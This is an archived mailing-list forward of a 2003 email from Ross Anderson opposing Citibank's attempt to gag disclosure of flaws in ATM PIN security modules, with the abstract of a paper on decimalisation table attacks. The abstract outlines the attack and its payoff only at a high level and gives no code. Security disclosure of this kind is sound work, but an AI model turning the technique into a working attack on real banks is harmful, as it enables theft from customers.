[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FYI] R. Anderson: Citibank tries to gag crypto bug disclosure
-> http://cryptome.org/
--- snip ---
To: ukcrypto@chiark.greenend.org.uk
Subject: Citibank tries to gag crypto bug disclosure
Date: Thu, 20 Feb 2003 09:57:34 +0000
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Citibank is trying to get an order in the High Court today gagging public
disclosure of crypto vulnerabilities:
http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf
I have written to the judge opposing the order:
http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf
The background is that my student Mike Bond has discovered some really
horrendous vulnerabilities in the cryptographic equipment commonly used to
protect the PINs used to identify customers to cash machines:
http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
These vulnerabilities mean that bank insiders can almost trivially find out
the PINs of any or all customers. The discoveries happened while Mike and I
were working as expert witnesses on a `phantom withdrawal' case.
The vulnerabilities are also scientifically interesting:
http://cryptome.org/pacc.htm
For the last couple of years or so there has been a rising tide of
phantoms. I get emails with increasing frequency from people all over the
world whose banks have debited them for ATM withdrawals that they deny
making. Banks in many countries simply claim that their systems are secure
and so the customers must be responsible. It now looks like some of these
vulnerabilities have also been discovered by the bad guys. Our courts and
regulators should make the banks fix their systems, rather than just lying
about security and dumping the costs on the customers.
Curiously enough, Citi was also the bank in the case that set US law on
phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's
an omen, if not a precedent ...
_____
Abstract
We present an attack on hardware security modules used by retail banks for
the secure storage and verification of customer PINs in ATM (cash machine)
infrastructures. By using adaptive decimalisation tables and guesses, the
maximum amount of information is learnt about the true PIN upon each guess.
It takes an average of 15 guesses to determine a four digit PIN using this
technique, instead of the 5000 guesses intended. In a single 30 minute
lunch-break, an attacker can thus discover approximately 7000 PINs rather
than 24 with the brute force method. With a $300 withdrawal limit per card,
the potential bounty is raised from $7200 to $2.1 million and a single
motivated attacker could withdraw $30{50 thousand of this each day. This
attack thus presents a serious threat to bank security.
-- Mike Bond and Piotr Zielinski, Decimalisation table attacks for PIN
cracking, February 2003
--- snap ---
--
To unsubscribe, e-mail: debate-unsubscribe@lists.fitug.de
For additional commands, e-mail: debate-help@lists.fitug.de